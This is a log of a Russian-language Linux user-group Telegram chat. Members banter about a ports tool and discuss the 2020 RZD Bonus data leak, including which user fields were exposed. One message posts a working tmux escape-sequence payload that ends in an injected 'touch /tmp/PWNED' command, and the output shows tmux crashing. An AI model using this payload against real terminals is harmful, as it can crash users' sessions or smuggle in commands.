Size: a a a

2020 November 07

VO

Vyacheslav Olkhovche... in SPbLUG chat
в пудре нет руби. только шелл
источник

AA

Artyom Abramovich in SPbLUG chat
Phil Kulin
Очень крутая штука. Несмотря на руби.
источник

PK

Phil Kulin in SPbLUG chat
Vyacheslav Olkhovchenkov
в пудре нет руби. только шелл
А. c. Почему я думал, что руби
источник

AA

Artyom Abramovich in SPbLUG chat
 $ echo -e \
> '\033[::::::::::::::::::1431723856::::::::1432185743::::1431836040::m;touch /tmp/PWNED;\0';
[server exited unexpectedly]

гыг, tmux падает
источник

VO

Vyacheslav Olkhovche... in SPbLUG chat
Phil Kulin
А. c. Почему я думал, что руби
ты с какм портмастером перепутал поди
источник

PK

Phil Kulin in SPbLUG chat
Vyacheslav Olkhovchenkov
ты с какм портмастером перепутал поди
Видимо да. Точно. Наверное я бы так не думал хорошо о порохе, если бы он на рубях был
источник

D

Doshich in SPbLUG chat
Vadim "Oxyd" Priluzkiy
А у вас в этой самой генте systemd или что?
Опенрси
источник

D

Doshich in SPbLUG chat
Vyacheslav Olkhovchenkov
самое время гентушникам изобрести пудру!
Объясните
источник

VP

Vadim "Oxyd&quo... in SPbLUG chat
Phil Kulin
Очень крутая штука. Несмотря на руби.
А на человеческий — аглицкий перевести? Я не понимаю о чём речь.
источник
2020 November 08

И

Иван in SPbLUG chat
It's very cool shtuka!  Ruby inside not important.
источник

И

Иван in SPbLUG chat
rzd-bonus.ru не отвечает. от слова совсем. чинят видать.
источник

VP

Vadim "Oxyd&quo... in SPbLUG chat
Иван
rzd-bonus.ru не отвечает. от слова совсем. чинят видать.
А может их сломали к куям.
источник

И

Иван in SPbLUG chat
источник

И

Иван in SPbLUG chat
По информации РИА Новости: «РЖД зафиксировали попытку взлома „РЖД Бонус“, система безопасности предотвратила доступ к персональным данным участников, сообщили в компании. В целях безопасности всем пользователям будет предложено сменить пароль при входе на сайт».
источник

И

Иван in SPbLUG chat
я вот смотрю на скриншот bash_history и думаю - зачем screen без параметров? просто чтоб был еще шел? или как-то историю скрыть?
источник

И

Иван in SPbLUG chat
так что у кого там паспорта и прочее было? спите спокойно, доступ предотвращен -))
источник

VP

Vadim "Oxyd&quo... in SPbLUG chat
Иван
так что у кого там паспорта и прочее было? спите спокойно, доступ предотвращен -))
Свежо предание, да верится с трудом. ©
источник

И

Иван in SPbLUG chat
тег сарказм я прывычно не указываю -))
источник

VP

Vadim "Oxyd&quo... in SPbLUG chat
Ты-дыдым!
источник

VP

Vadim "Oxyd&quo... in SPbLUG chat
Вчера в 15:50 (МСК) один из Telegram-каналов сообщил, что на сайте «РЖД Бонус» (rzd-bonus.rurzd-bonus.ru, в данный момент не работает) в свободном доступе находится MySQL-дамп базы данных этого сайта и два других файла (bash_history-файл и закрытый RSA-ключ). В bash_history, помимо пути к дампу базы данных, находился логин и пароль пользователя. 🔥🔥🔥

Дамп размером около 2,4 Гб оставался в открытом доступе примерно до 19:00 (МСК) и судя по сообщениям в многочисленных чатах, его успело скачать достаточно большое количество человек. 😱

Несколько подписчиков прислали нам образцы из этого дампа, в том числе пример записей из таблицы «b_user», содержащей 1,360,836 строк:

🌵 адрес эл. почты
🌵 ID-пользователя
🌵 хешированный (MD5 с солью, в формате CMS «Bitrix») пароль
🌵 дата регистрации и последнего входа в систему

Кроме того, в таблице «b_event_log» находился детальный лог доступа пользователей к сайту:

🌵 IP-адрес
🌵 User-Agent и версия ОС
🌵 ID-пользователя
🌵 дата доступа (с 07.08.2020 по 08.10.2020)
источник